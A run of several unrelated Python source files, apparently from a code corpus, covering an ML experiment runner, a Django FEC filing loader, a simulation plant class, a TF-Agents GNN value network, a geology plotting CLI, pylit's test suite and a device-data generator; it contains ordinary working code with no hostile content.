'Mean RMSL2': mean_rmse} elif algo == 'Detlefsen (fixed)' and dataset == 'toy': ll, mean_rmse, mean, std = detlefsen_toy_baseline(x_train, y_train, x_eval, y_eval, bug_fix=True) metrics = {'LL': ll, 'Mean RMSL2': mean_rmse} elif algo == 'Detlefsen' and dataset != 'toy': ll, rmsl2, mean, var_samples = detlefsen_uci_baseline(x_train, y_train, x_eval, y_eval, batch_iterations, batch_size, copy.deepcopy(parser)) py_x = monte_carlo_student_t(mean, 1 / var_samples) metrics = {'LL': ll, 'Mean RMSL2': rmsl2} metrics.update(compute_metrics(y_eval, py_x.mean(), py_x.stddev(), py_x.sample())) else: mdl, metrics, mean, std, nan_detected = train_and_eval(dataset, algo, prior_type, epochs, batch_size, x_train, y_train, x_eval, y_eval, parallel, **kwargs) # save top priors for VBEM if prior_type == 'VBEM': indices, counts = np.unique(np.argmax(mdl.pi(x_eval), axis=1), return_counts=True) for i, c in zip(indices, counts): a = tf.nn.softplus(mdl.u[i]).numpy()[0] b = tf.nn.softplus(mdl.v[i]).numpy()[0] vbem_logger = vbem_logger.append(pd.DataFrame({'a': a, 'b': b, 'wins': c}, index=[t])) vbem_logger.to_pickle(prior_file) # print update print(dataset, algo, prior_type, '{:d}/{:d}:'.format(t + 1, n_trials)) print(metrics) # print and log NaNs if nan_detected: print('**** NaN Detected ****') print(dataset, prior_fam, prior_type, t + 1, file=open(nan_file, 'a')) # save results metrics.update({'Algorithm': algo, 'Prior': prior_type, 'Hyper-Parameters': hyper_params}) logger = logger.append(pd.DataFrame(metrics, index=[t])) logger.to_pickle(logger_file) if dataset == 'toy': mv_logger.update(algo, prior_type, x_train, y_train, x_eval, mean, std, trial=t) mv_logger.df_data.to_pickle(data_file) mv_logger.df_eval.to_pickle(mv_file) if __name__ == '__main__': # script arguments parser = argparse.ArgumentParser() parser.add_argument('--algorithm', type=str, default='Normal', help='algorithm') parser.add_argument('--dataset', type=str, default='boston', help='data set name = {toy} union UCI sets') parser.add_argument('--mode', type=str, default='resume', help='mode in {replace, resume}') parser.add_argument('--prior_type', type=str, help='prior type') parser.add_argument('--a', type=float, help='standard prior parameter') parser.add_argument('--b', type=float, help='standard prior parameter') parser.add_argument('--k', type=int, help='number of mixing prior components') parser.add_argument('--parallel', type=int, default=0, help='adjust console print out for parallel runs') parser.add_argument('--seed_init', default=1234, type=int, help='random seed init, multiplied by trial number') args = parser.parse_args() # check inputs assert args.dataset in {'toy'}.union(set(os.listdir('data'))) # assemble configuration dictionary KWARGS = {} if args.prior_type is not None: KWARGS.update({'prior_type': args.prior_type}) if args.a is not None: KWARGS.update({'a': args.a}) if args.b is not None: KWARGS.update({'b': args.b}) if args.k is not None: KWARGS.update({'k': args.k}) # make result directory if it doesn't already exist os.makedirs(RESULTS_DIR, exist_ok=True) # run experiments run_experiments(args.algorithm, args.dataset, args.mode, bool(args.parallel), **KWARGS) import pytz import datetime import os import requests import csv import process_filing import time import traceback import sys from cycle_2020.models import * from cycle_2020.utils import loader from django.core.management.base import BaseCommand, CommandError from utils.date_validation import date_validation import logging, uuid import systemd.daemon systemd.daemon.notify('READY=1') LOGLEVEL = os.environ.get('LOGLEVEL', 'INFO').upper() SYSLOG_IDENTIFIER = os.environ.get('SYSLOG_IDENTIFIER','') logger = logging.getLogger("cnn-fec."+__name__) logger.setLevel(LOGLEVEL) myid=uuid.uuid4() class Command(BaseCommand): def add_arguments(self, parser): parser.add_argument('--filing_dir', dest='filing_dir', help='where to save and read filings from') #default is to do past two days def handle(self, *args, **options): fec_time=pytz.timezone('US/Eastern') #fec time is eastern unparsed_start = datetime.datetime.now(fec_time) - datetime.timedelta(days=2) start_date = unparsed_start.strftime('%Y%m%d') unparsed_end = datetime.datetime.now(fec_time) + datetime.timedelta(days=1) end_date = unparsed_end.strftime('%Y%m%d') if date_validation(os.environ.get('STARTDATE')): start_date = os.environ.get('STARTDATE') if date_validation(os.environ.get('ENDDATE')): end_date = os.environ.get('ENDDATE') if options['filing_dir']: filing_dir = options['filing_dir'] else: filing_dir = 'filings/' myextra = {'MESSAGE_ID':myid,'SYSLOG_IDENTIFIER':SYSLOG_IDENTIFIER} logger.info("looking for filings for period {}-{}".format(start_date, end_date), extra=myextra) filings = loader.get_filing_list(start_date, end_date, myextra=myextra) if not filings: logger.warning("failed to find any filings for period {}-{}".format(start_date, end_date), extra=myextra) loader.download_filings(filings, filing_dir, myextra=myextra) loader.load_filings(filing_dir,myextra=myextra) __version__ = '0.1.0' from .sms_service import SMSBackend try: from django.conf import settings backend = settings.EMAIL_BACKEND host = settings.POSTMAN_HOST e_route = settings.POSTMAN_EMAIL_ROUTE s_route = settings.POSTMAN_SMS_ROUTE auth = settings.POSTMAN_AUTHKEY except Exception as e: __RED = '\033[91m' raise NotImplementedError(__RED+'Make sure you have imported EMAIL_BACKEND and POSTMAN settings. Detailed ERROR, '+str(e) + __RED) sms_backend = SMSBackend() from .Plant import Plant from ..Position import Position from ..Action import Action from ..ActionEnum import ActionEnum class Toadstool(Plant): def __init__(self, toadstool=None, position=None, world=None): super(Toadstool, self).__init__(toadstool, position, world) def clone(self): return Toadstool(self, None, None) def initParams(self): self.power = 0 self.initiative = 0 self.liveLength = 10 self.powerToReproduce = 5 self.sign = 'T' def consequences(self, atackingOrganism): result = [] if self.power > atackingOrganism.power: result.append(Action(ActionEnum.A_REMOVE, Position(xPosition=-1, yPosition=-1), 0, atackingOrganism)) else: result.append(Action(ActionEnum.A_REMOVE, Position(xPosition=-1, yPosition=-1), 0, self)) result.append(Action(ActionEnum.A_REMOVE, Position(xPosition=-1, yPosition=-1), 0, atackingOrganism)) return result # Copyright (c) 2020 fortiss GmbH # # Authors: # # This work is licensed under the terms of the MIT license. # For a copy, see . import gin import tensorflow as tf # pylint: disable=unused-import from tf_agents.networks import network, encoding_network from bark.runtime.commons.parameters import ParameterServer @gin.configurable class GNNValueNetwork(network.Network): """Feed Forward value network. Reduces to 1 value output per batch item.""" def __init__(self, input_tensor_spec, gnn, preprocessing_layers=None, preprocessing_combiner=None, conv_layer_params=None, fc_layer_params=(75, 40), dropout_layer_params=None, activation_fn=tf.nn.relu, kernel_initializer=None, batch_squash=False, dtype=tf.float32, name='ValueNetwork', params=ParameterServer()): """ Creates an instance of `ValueNetwork`. Network supports calls with shape outer_rank + observation_spec.shape. Note outer_rank must be at least 1. Args: input_tensor_spec: A `tensor_spec.TensorSpec` or a tuple of specs representing the input observations. preprocessing_layers: (Optional.) A nest of `tf.keras.layers.Layer` representing preprocessing for the different observations. All of these layers must not be already built. For more details see the documentation of `networks.EncodingNetwork`. preprocessing_combiner: (Optional.) A keras layer that takes a flat list of tensors and combines them. Good options include `tf.keras.layers.Add` and `tf.keras.layers.Concatenate(axis=-1)`. This layer must not be already built. For more details see the documentation of `networks.EncodingNetwork`. conv_layer_params: Optional list of convolution layers parameters, where each item is a length-three tuple indicating (filters, kernel_size, stride). fc_layer_params: Optional list of fully_connected parameters, where each item is the number of units in the layer. dropout_layer_params: Optional list of dropout layer parameters, each item is the fraction of input units to drop or a dictionary of parameters according to the keras.Dropout documentation. The additional parameter `permanent', if set to True, allows to apply dropout at inference for approximated Bayesian inference. The dropout layers are interleaved with the fully connected layers; there is a dropout layer after each fully connected layer, except if the entry in the list is None. This list must have the same length of fc_layer_params, or be None. activation_fn: Activation function, e.g. tf.keras.activations.relu,. kernel_initializer: Initializer to use for the kernels of the conv and dense layers. If none is provided a default variance_scaling_initializer batch_squash: If True the outer_ranks of the observation are squashed into the batch dimension. This allow encoding networks to be used with observations with shape [BxTx...]. dtype: The dtype to use by the convolution and fully connected layers. name: A string representing name of the network. Raises: ValueError: If input_tensor_spec is not an instance of network.InputSpec. """ super(GNNValueNetwork, self).__init__( input_tensor_spec=input_tensor_spec, state_spec=(), name=name) if not kernel_initializer: kernel_initializer = tf.compat.v1.keras.initializers.glorot_uniform() if gnn is None: raise ValueError('`gnn` must not be `None`.') self._gnn = gnn(name=name + "_GNN", params=params) self._encoder = encoding_network.EncodingNetwork( input_tensor_spec=tf.TensorSpec([None, self._gnn._embedding_size]), preprocessing_layers=None, preprocessing_combiner=None, conv_layer_params=conv_layer_params, fc_layer_params=fc_layer_params, dropout_layer_params=dropout_layer_params, activation_fn=tf.keras.activations.relu, kernel_initializer=kernel_initializer, batch_squash=False, dtype=tf.float32) self._postprocessing_layers = tf.keras.layers.Dense( 1, activation=None, kernel_initializer=tf.compat.v1.initializers.random_uniform( minval=-0.03, maxval=0.03)) def call(self, observations, step_type=None, network_state=(), training=False): # print(observations) if len(tf.shape(observations)) == 3: observations = tf.squeeze(observations, axis=0) embeddings = self._gnn(observations, training=training) if tf.shape(embeddings)[0] > 0: embeddings = embeddings[:, 0] # extract ego state with tf.name_scope("PPOCriticNetwork"): tf.summary.histogram("embedding", embeddings) state, network_state = self._encoder( embeddings, step_type=step_type, network_state=network_state, training=training) value = self._postprocessing_layers(state, training=training) value = tf.expand_dims(value, axis=0) return tf.squeeze(value, -1), network_state# -*- coding: utf-8 -*- # Royal HaskoningDHV from xsboringen.scripts.write_csv import write_csv from xsboringen.scripts.write_shape import write_shape from xsboringen.scripts.plot import plot_cross_section import click import yaml from collections import ChainMap import logging import os log = logging.getLogger(os.path.basename(__file__)) @click.command() @click.argument('function', type=click.Choice(['write_csv', 'write_shape', 'plot']), ) @click.argument('inputfile', ) @click.option('--logging', 'level', type=click.Choice(['warning', 'info', 'debug']), default='info', help='log messages level' ) def main(function, inputfile, level): '''plot geological cross-sections''' logging.basicConfig(level=level.upper()) # function arguments from input file with open(inputfile) as y: kwargs = yaml.load(y) # read default config scripts_folder = os.path.dirname(os.path.realpath(__file__)) defaultconfigfile = os.path.join(os.path.dirname(scripts_folder), 'defaultconfig.yaml') with open(defaultconfigfile) as y: defaultconfig = yaml.load(y) # get user config from input file userconfig = kwargs.get('config') or {} # chain config kwargs['config'] = ChainMap(userconfig, defaultconfig) # dispatch function if function == 'write_csv': write_csv(**kwargs) elif function == 'write_shape': write_shape(**kwargs) elif function == 'plot': plot_cross_section(**kwargs) if __name__ == '__main__': main() LawrenceDior/thetis0 #!/usr/bin/env python # -*- coding: iso-8859-1 -*- ## pylit_test.py ## ************* ## Test pylit.py Python Module ## +++++++++++++++++++++++++++ ## ## :Date: $Date: 2007-05-17 $ ## :Version: SVN-Revision $Revision: 45 $ ## :URL: $URL: svn+ssh://svn.berlios.de/svnroot/repos/pylit/trunk/test/pylit_test.py $ ## :Copyright: 2006 . ## Released under the terms of the GNU General Public License ## (v. 2 or later) ## ## .. contents:: ## ## A catalogue of errors ## ===================== ## ## from file:///home/milde/Texte/Doc/Programmierung/Software-Carpentry/lec/unit.html ## ## * Numbers: zero, largest, smallest magnitude, most negative ## * Structures: empty, exactly one element, maximum number of elements ## - Duplicate elements (e.g., letter "J" appears three times in a string) ## - Aliased elements (e.g., a list contains two references to another list) ## - Circular structures (e.g., a list that contains a reference to itself) ## * Searching: no match found, one match found, multiple matches found, ## everything matches ## - Code like x = find_all(structure)[0] is almost always wrong ## - Should also check aliased matches (same thing found multiple times) ## :: """pylit_test.py: test the "literal python" module""" from pprint import pprint import operator from pylit import * import nose ## Test DefaultDict ## ================ class test_DefaultDict(object): """Test the DefaultDict dictionary with custom default""" def setUp(self): self.defdict = DefaultDict('#') def test_get_default(self): assert self.defdict['nonexisting'] == '#' def test_set_get(self): self.defdict['mykey'] = 3 assert self.defdict['mykey'] == 3 def test_change_default(self): self.defdict.default = '%' assert self.defdict['nonexisting'] == '%' def test_init_args(self): di = DefaultDict('#', {'mykey': 3}) assert di['mykey'] == 3 assert di['nonexisting'] == '#' def test_init_args2(self): di = DefaultDict('#', mykey = 3) assert di['mykey'] == 3 assert di['nonexisting'] == '#' def test_init_args3(self): di = DefaultDict('#', [('mykey', 3)]) assert di['mykey'] == 3 assert di['nonexisting'] == '#' ## Text <-> Code conversion ## ======================== ## ## Test strings ## ============ ## ## Example of text, code and stripped code with typical features":: text = """.. #!/usr/bin/env python # -*- coding: iso-8859-1 -*- Leading text in several paragraphs followed by a literal block:: block1 = 'first block' Some more text and the next block. :: block2 = 'second block' print block1, block2 Trailing text. """ # print text ## The converter expects the data in separate lines (iterator or list) ## with trailing newlines. We use the `splitlines` string method with ## `keepends=True`:: textdata = text.splitlines(True) # print textdata ## If a "code" source is converted with the `strip` option, only text blocks ## are extracted, which leads to:: stripped_text = """Leading text in several paragraphs followed by a literal block: Some more text and the next block. Trailing text. """ ## The code corresponding to the text test string. ## ## Using a triple-quoted string for the code (and stripped_code) can create ## problems with the conversion of this test by pylit (as the text parts ## would be converted to text). ## A workaround is using a different comment string for the text blocks and ## converting with e.g. ``pylit --comment-string='## ' pylit_test.py``. ## ## :: code = """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- # Leading text # # in several paragraphs followed by a literal block:: block1 = 'first block' # Some more text and the next block. :: block2 = 'second block' print block1, block2 # Trailing text. """ # print code codedata = code.splitlines(True) ## Converting the text teststring with the `strip` option leads to:: stripped_code = """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- block1 = 'first block' block2 = 'second block' print block1, block2 """ ## pprint(textdata) ## pprint(stripped_code.splitlines(True)) ## ## Containers for special case examples: ## ## 1. Text2Code samples ## ``textsamples["what"] = (, , , , code""" ## :: def setUp(self): self.converter = Text2Code(textdata) ## test helper funs :: def test_set_state_empty(self): try: self.converter.set_state([]) raise AssertionError, "should raise StopIteration" except StopIteration: pass def test_set_state_header(self): """test for "header" or "documentation" for first block""" self.converter.state = "" # normally set by the `convert` method self.converter.set_state([".. header", " block"]) assert self.converter.state == "header" self.converter.state = "" # normally set by the `convert` method self.converter.set_state(["documentation", "block"]) assert self.converter.state == "documentation" def test_set_state_code_block(self): """test for "header" or "documentation" for "code_block" """ # normally set by the `convert` method self.converter._textindent = 0 self.converter.state = "code_block" self.converter.set_state(["documentation", " block"]) assert self.converter.state == "documentation" self.converter.state = "code_block" self.converter.set_state([" documentation", "block"]) assert self.converter.state == "documentation" self.converter.state = "code_block" self.converter.set_state([" code", " block"]) print self.converter.state assert self.converter.state == "code_block" def test_header_handler(self): """should strip header-string from header""" self.converter._codeindent = 0 sample = [".. header", " block"] lines = [line for line in self.converter.header_handler(sample)] print lines assert lines == ["header", "block"] def test_documentation_handler(self): """should add comment string to documentation""" sample = ["doc", "block", ""] lines = [line for line in self.converter.documentation_handler(sample)] print lines assert lines == ["# doc", "# block", "# "] def test_documentation_handler_set_state(self): """should add comment string to documentation""" sample = ["doc", "block::", ""] lines = [line for line in self.converter.documentation_handler(sample)] print lines assert lines == ["# doc", "# block::", ""] assert self.converter.state == "code_block" def test_code_block_handler(self): """should un-indent code-blocks""" self.converter._codeindent = 0 # normally set in `convert` sample = [" code", " block", ""] lines = [line for line in self.converter.code_block_handler(sample)] print lines assert lines == ["code", "block", ""] ## base tests on the "long" test data :: def test_call(self): """Calling a Text2Code instance should return the converted data as list of lines""" output = self.converter() print repr(codedata) print repr(output) assert codedata == output def test_call_strip(self): """strip=True should strip text parts""" self.converter.strip = True output = self.converter() print repr(stripped_code.splitlines(True)) print repr(output) assert stripped_code.splitlines(True) == output def test_str(self): outstr = str(self.converter) print repr(code) print repr(outstr) assert code == outstr def test_str_strip1(self): """strip=True should strip text parts. Version 1 with `strip` given as optional argument""" outstr = str(Text2Code(textdata, strip=True)) print "ist ", repr(outstr) print "soll", repr(stripped_code) # pprint(outstr) assert stripped_code == outstr def test_str_strip2(self): """strip=True should strip text parts Version 2 with `strip` set after instantiation""" self.converter.strip = True outstr = str(self.converter) print "ist ", repr(outstr) print "soll", repr(stripped_code) # pprint(outstr) assert stripped_code == outstr def test_malindented_code_line(self): """raise error if code line is less indented than code-indent""" data1 = [".. #!/usr/bin/env python\n", # indent == 4 * " " "\n", " print 'hello world'"] # indent == 2 * " " data2 = ["..\t#!/usr/bin/env python\n", # indent == 8 * " " "\n", " print 'hello world'"] # indent == 2 * " " for data in (data1, data2): try: blocks = Text2Code(data)() assert False, "wrong indent did not raise ValueError" except ValueError: pass def test_str_different_comment_string(self): """Convert only comments with the specified comment string to text """ data = [".. #!/usr/bin/env python\n", '\n', '::\n', # leading code block as header '\n', " block1 = 'first block'\n", '\n', 'more text'] soll = "\n".join(["#!/usr/bin/env python", "", "##::", "", "block1 = 'first block'", "", "##more text"] ) outstr = str(Text2Code(data, comment_string="##")) print "soll:", repr(soll) print "ist: ", repr(outstr) assert outstr == soll # Filters: test pre- and postprocessing of data def test_get_filter_preprocessor(self): """should return filter from filter_set for language""" preprocessor = self.converter.get_filter("preprocessors", "rl") print preprocessor assert preprocessor == l2r_filter def test_get_filter_postprocessor(self): """should return filter from filter_set for language""" postprocessor = self.converter.get_filter("postprocessors", "x") print postprocessor assert postprocessor == u2x_filter def test_get_css_postprocessor(self): """should return filter from filter_set for language""" postprocessor = self.converter.get_filter("postprocessors", "css") print postprocessor assert postprocessor == dumb_c_postprocessor def test_get_filter_nonexisting_language_filter(self): """should return identity_filter if language has no filter in set""" preprocessor = self.converter.get_filter("preprocessors", "foo") print preprocessor assert preprocessor == identity_filter def test_get_filter_nonexisting_filter_set(self): """should return identity_filter if filter_set does not exist""" processor = self.converter.get_filter("foo_filters", "foo") print processor assert processor == identity_filter def test_preprocessor(self): """Preprocess data with registered preprocessor for language""" output = Text2Code(textdata, language="x", comment_string="# ")() soll = [line for line in u2x_filter(codedata)] print "soll: ", repr(soll) print "ist: ", repr(output) assert output == soll def test_postprocessor(self): """Preprocess data with registered postprocessor for language""" output = Text2Code(textdata, language="x", comment_string="# ")() soll = [line for line in u2x_filter(codedata)] print "soll:", repr(soll) print "ist: ", repr(output) assert output == soll ## Special Cases ## ------------- ## ## Code follows text block without blank line ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## End of text block detected ('::') but no paragraph separator (blank line) ## follows ## ## It is an reStructuredText syntax error, if a "literal block ## marker" is not followed by a blank line. ## ## Assuming that no double colon at end of line occurs accidentally, ## pylit could fix this and issue a warning:: # Do we need this feature? (Complicates code a lot) # textsamples["ensure blank line after text"] = ( # """text followed by a literal block:: # block1 = 'first block' # """, # """# text followed by a literal block:: # # block1 = 'first block' # """) ## Text follows code block without blank line ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## End of code block detected (a line not more indented than the preceding text ## block) ## ## reStructuredText syntax demands a paragraph separator (blank line) before ## it. ## ## Assuming that the unindent is not accidental, pylit could fix this and ## issues a warning:: # Do we need this feature? (Complicates code) # textsamples["ensure blank line after code"] = ( # """:: # # block1 = 'first block' # more text # """, # """# :: # # block1 = 'first block' # # more text # """) ## Options follow code-block directive ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ textsamples["code-block directive options"] = ( """\ :: :option: argument this = 'code' """, """\ # :: # :option: argument this = 'code' """) textsamples["no code-block directive options"] = ( """\ :: text following ``::`` without blank line more documentation """, """\ # :: # text following ``::`` without blank line # # more documentation """) ## A double colon on a line on its own ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## As a double colon is added by the Code2Text conversion after a text block ## (if not already present), it could be removed by the Text2Code conversion ## to keep the source small and pretty. ## ## However, this would put the text and code source line numbers out of sync, ## which is bad for error reporting, failing doctests, and the JED editor ## support with the `pylit_buffer()` function in ## http://jedmodes.sf.net/mode/pylit.sl . ## ## Maybe this could be left to a post-processing filter:: # textsamples["remove single double colon"] = ( # ["text followed by a literal block\n", # "\n", # "::\n", # "\n", # " foo = 'first'\n"] # ["", # empty header # "# text followed by a literal block\n\n", # "foo = 'first'\n"] ## header samples ## ~~~~~~~~~~~~~~ ## Convert a leading reStructured text comment (variant: only if there is ## content on the first line) to a leading code block. Return an empty list, ## if there is no header. :: textsamples["simple header"] = (".. print 'hello world'", "print 'hello world'") textsamples["no header (start with text)"] = ( """a classical example without header:: print 'hello world' """, """# a classical example without header:: print 'hello world' """) textsamples["no header (start with blank line)"] = ( """ a classical example without header:: print 'hello world' """, """# # a classical example without header:: print 'hello world' """) textsamples["standard header, followed by text"] = ( """.. #!/usr/bin/env python # -*- coding: iso-8859-1 -*- a classical example with header:: print 'hello world' """, """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- # a classical example with header:: print 'hello world' """) textsamples["standard header, followed by code"] = ( """.. #!/usr/bin/env python print 'hello world' """, """#!/usr/bin/env python print 'hello world' """) textsamples["null string"] = ("", "", "") ## Code2Text ## ========= ## ## :: class test_Code2Text(object): def setUp(self): self.converter = Code2Text(codedata) ## Code2Text.strip_literal_marker ## ## * strip `::`-line as well as preceding blank line if on a line on its own ## * strip `::` if it is preceded by whitespace. ## * convert `::` to a single colon if preceded by text ## ## :: def check_strip_code_block_marker(self, sample): """test Code2Text.strip_code_block_marker""" ist = sample[0].splitlines(True) soll = sample[1].splitlines(True) print "before", ist converter = Code2Text(codedata) converter.strip_code_block_marker(ist) print "soll:", repr(soll) print "ist: ", repr(ist) assert ist == soll def test_strip_code_block_marker(self): samples = (("text\n\n::\n\n", "text\n\n"), ("text\n::\n\n", "text\n\n"), ("text ::\n\n", "text\n\n"), ("text::\n\n", "text:\n\n"), ("text:\n\n", "text:\n\n"), ("text\n\n", "text\n\n"), ("text\n", "text\n") ) for sample in samples: yield (self.check_strip_code_block_marker, sample) ## Code2Text.set_state ## :: def test_set_state(self): samples = (("code_block", ["code_block\n"], "code_block"), ("code_block", ["#code_block\n"], "code_block"), ("code_block", ["## code_block\n"], "code_block"), ("code_block", ["# documentation\n"], "documentation"), ("code_block", ["# documentation\n"], "documentation"), ("code_block", ["# \n"], "documentation"), ("code_block", ["#\n"], "documentation"), ("code_block", ["\n"], "documentation"), ("", ["code_block\n"], "header"), ("", ["# documentation\n"], "documentation"), ("documentation", ["code_block\n"], "code_block"), ("documentation", ["# documentation\n"], "documentation"), ) print "comment string", repr(self.converter.comment_string) for (old_state, lines, soll) in samples: self.converter.state = old_state self.converter.set_state(lines) print repr(lines), "old state", old_state print "soll", repr(soll), print "result", repr(self.converter.state) assert soll == self.converter.state ## base tests on the "long" test strings :: def test_call(self): output = self.converter() print repr(textdata) print repr(output) assert textdata == output def test_call_strip(self): output = Code2Text(codedata, strip=True)() print repr(stripped_text.splitlines(True)) print repr(output) assert stripped_text.splitlines(True) == output def test_str(self): """Test Code2Text class converting code->text""" outstr = str(self.converter) # print text print "soll:", repr(text) print "ist: ", repr(outstr) assert text == outstr def test_str_strip(self): """Test Code2Text class converting code->rst with strip=True Should strip code blocks """ outstr = str(Code2Text(codedata, strip=True)) print repr(stripped_text) print repr(outstr) assert stripped_text == outstr def test_str_different_comment_string(self): """Convert only comments with the specified comment string to text """ outstr = str(Code2Text(codedata, comment_string="##", strip=True)) print outstr assert outstr == "" data = ["# ::\n", "\n", "block1 = 'first block'\n", "\n", "## more text"] soll = "\n".join(['.. # ::', # leading code block as header ' ', " block1 = 'first block'", ' ', ' more text'] # keep space (not part of comment string) ) outstr = str(Code2Text(data, comment_string="##")) print "soll:", repr(soll) print "ist: ", repr(outstr) assert outstr == soll def test_call_different_code_block_marker(self): """recognize specified code-block marker """ data = ["# .. code-block:: python\n", "\n", "block1 = 'first block'\n", "\n", "# more text\n"] soll = ['.. code-block:: python\n', '\n', " block1 = 'first block'\n", ' \n', ' more text\n'] # keep space (not part of comment string) converter = Code2Text(data, code_block_marker='.. code-block::') output = converter() print "soll:", repr(soll) print "ist: ", repr(output) assert output == soll # Filters: test pre- and postprocessing of Code2Text data conversion def test_get_filter_preprocessor(self): """should return Code2Text preprocessor for language""" preprocessor = self.converter.get_filter("preprocessors", "rl") print preprocessor assert preprocessor == r2l_filter def test_get_css_preprocessor(self): """should return filter from filter_set for language""" preprocessor = self.converter.get_filter("preprocessors", "css") print preprocessor assert preprocessor == dumb_c_preprocessor def test_get_filter_postprocessor(self): """should return Code2Text postprocessor for language""" postprocessor = self.converter.get_filter("postprocessors", "x") print postprocessor assert postprocessor == x2u_filter def test_get_filter_nonexisting_language_filter(self): """should return identity_filter if language has no filter in set""" preprocessor = self.converter.get_filter("preprocessors", "foo") print preprocessor assert preprocessor == identity_filter def test_get_filter_nonexisting_filter_set(self): """should return identity_filter if filter_set does not exist""" processor = self.converter.get_filter("foo_filters", "foo") print processor assert processor == identity_filter def test_preprocessor(self): """Preprocess data with registered preprocessor for language""" converter = Code2Text(codedata, language="rl", comment_string="# ") print "preprocessor", converter.preprocessor print "postprocessor", converter.postprocessor output = converter() soll = [line.replace("r", "l") for line in textdata] print "ist: ", repr(output) print "soll:", repr(soll) assert output == soll def test_postprocessor(self): """Postprocess data with registered postprocessor for language""" output = Code2Text(codedata, language="x", comment_string="# ")() soll = [line.replace("x", "u") for line in textdata] print "soll:", repr(soll) print "ist: ", repr(output) assert output == soll ## Special cases ## ------------- ## ## blank comment line ## ~~~~~~~~~~~~~~~~~~ ## ## Normally, whitespace in the comment string is significant, i.e. with ## ``comment_string = "# "``, a line ``"#something\n"`` will count as code. ## ## However, if a comment line is blank, trailing whitespace in the comment ## string should be ignored, i.e. ``#\n`` is recognised as a blank text line:: codesamples["ignore trailing whitespace in comment string for blank line"] = ( """# :: block1 = 'first block' # # more text """, """:: block1 = 'first block' more text """) ## No blank line after text ## ~~~~~~~~~~~~~~~~~~~~~~~~ ## ## If a matching comment precedes or follows a code line (i.e. any line ## without matching comment) without a blank line in between, it counts as code ## line. ## ## This will keep small inline comments close to the code they comment on. It ## will also keep blocks together where one commented line does not match the ## comment string (the whole block will be kept as commented code) ## :: codesamples["comment before code (without blank line)"] = ( """\ # this is text:: # this is a comment foo = 'first' """, """\ this is text:: # this is a comment foo = 'first' """, """\ this is text: """) codesamples["comment block before code (without blank line)"] = ( """\ # no text (watch the comment sign in the next line):: # # this is a comment foo = 'first' """, """\ .. # no text (watch the comment sign in the next line):: # # this is a comment foo = 'first' """, "") codesamples["comment after code (without blank line)"] = ( """\ # :: block1 = 'first block' # commented code # text again """, """\ :: block1 = 'first block' # commented code text again """, """ text again """) codesamples["comment block after code (without blank line)"] = ( """\ # :: block1 = 'first block' # commented code # # still comment """, """:: block1 = 'first block' # commented code # # still comment """, """ """) ## missing literal block marker ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## If text (with matching comment string) is followed by code (line(s) without ## matching comment string), but there is no double colon at the end, back ## conversion would not recognise the end of text! ## ## Therefore, pylit adds a paragraph containing only ``::`` -- the literal ## block marker in expanded form. (While it would in many cases be nicer to ## add the double colon to the last text line, this is not always valid rst ## syntax, e.g. after a section header or a list. Therefore the automatic ## insertion will use the save form, feel free to correct this by hand.):: codesamples["insert missing double colon after text block"] = ( """# text followed by code without double colon foo = 'first' """, """text followed by code without double colon :: foo = 'first' """, """text followed by code without double colon """) codesamples["ignore directive options when looking for code-block marker"] = ( """\ # :: # :option: argument # :option2: argument this = 'code' """, """\ :: :option: argument :option2: argument this = 'code' """) codesamples["code-block marker followed by text not a directive option"] = ( """\ # :: # text following ``::`` without blank line this = 'code' """, """\ :: text following ``::`` without blank line :: this = 'code' """) ## header samples ## ~~~~~~~~~~~~~~ ## ## Convert a header (leading code block) to a reStructured text comment. :: codesamples["no matching comment, just code"] = ( """print 'hello world' print 'ende' """, """.. print 'hello world' print 'ende' """) codesamples["empty header (start with matching comment)"] = ( """# a classical example without header:: print 'hello world' """, """a classical example without header:: print 'hello world' """, """a classical example without header: """) codesamples["standard header, followed by text"] = ( """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- # a classical example with header:: print 'hello world' """, """.. #!/usr/bin/env python # -*- coding: iso-8859-1 -*- a classical example with header:: print 'hello world' """, """a classical example with header: """) codesamples["standard header, followed by code"] = ( """#!/usr/bin/env python print 'hello world' """, """.. #!/usr/bin/env python print 'hello world' """, "") ## Filter tests ## ============ ## ## :: css_code = ['/* import the default Docutils style sheet */\n', '/* --------------------------------------- */\n', '\n', '/* :: */\n', '\n', '/*comment*/\n', '@import url("html4css1.css"); /* style */\n'] ## :: css_filtered_code = ['// import the default Docutils style sheet\n', '// ---------------------------------------\n', '\n', '// ::\n', '\n', '/*comment*/\n', '@import url("html4css1.css"); /* style */\n'] ## :: def test_dumb_c_preprocessor(): """convert `C` to `C++` comments""" output = [line for line in dumb_c_preprocessor(css_code)] print "ist: %r"%output print "soll: %r"%css_filtered_code assert output == css_filtered_code ## :: def test_dumb_c_postprocessor(): """convert `C++` to `C` comments""" output = [line for line in dumb_c_postprocessor(css_filtered_code)] print "ist: %r"%output print "soll: %r"%css_code assert output == css_code ## :: if __name__ == "__main__": nose.runmodule() # requires nose 0.9.1 sys.exit() devsh/data/writedevicestatus-devsh.py0 #!/usr/bin/python # Originally based on https://github.infra.cloudera.com/EDU/bda-vm/blob/master/maintenance/datacreation/writedevicestatus.py import peewee from peewee import * import datetime import os import random #from common import * from dateutil.relativedelta import relativedelta import sys if len(sys.argv) != 2: quit('Specify the base output directory with a trailing slash') outputdirectory = sys.argv[1] if not os.path.exists(outputdirectory): os.mkdir(outputdirectory) startingDate = datetime.datetime(2018, 3, 15, 10, 10, 20) devicePatterns = { 'Sorrento' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'iFruit' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'Ronin' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'MeeToo' : 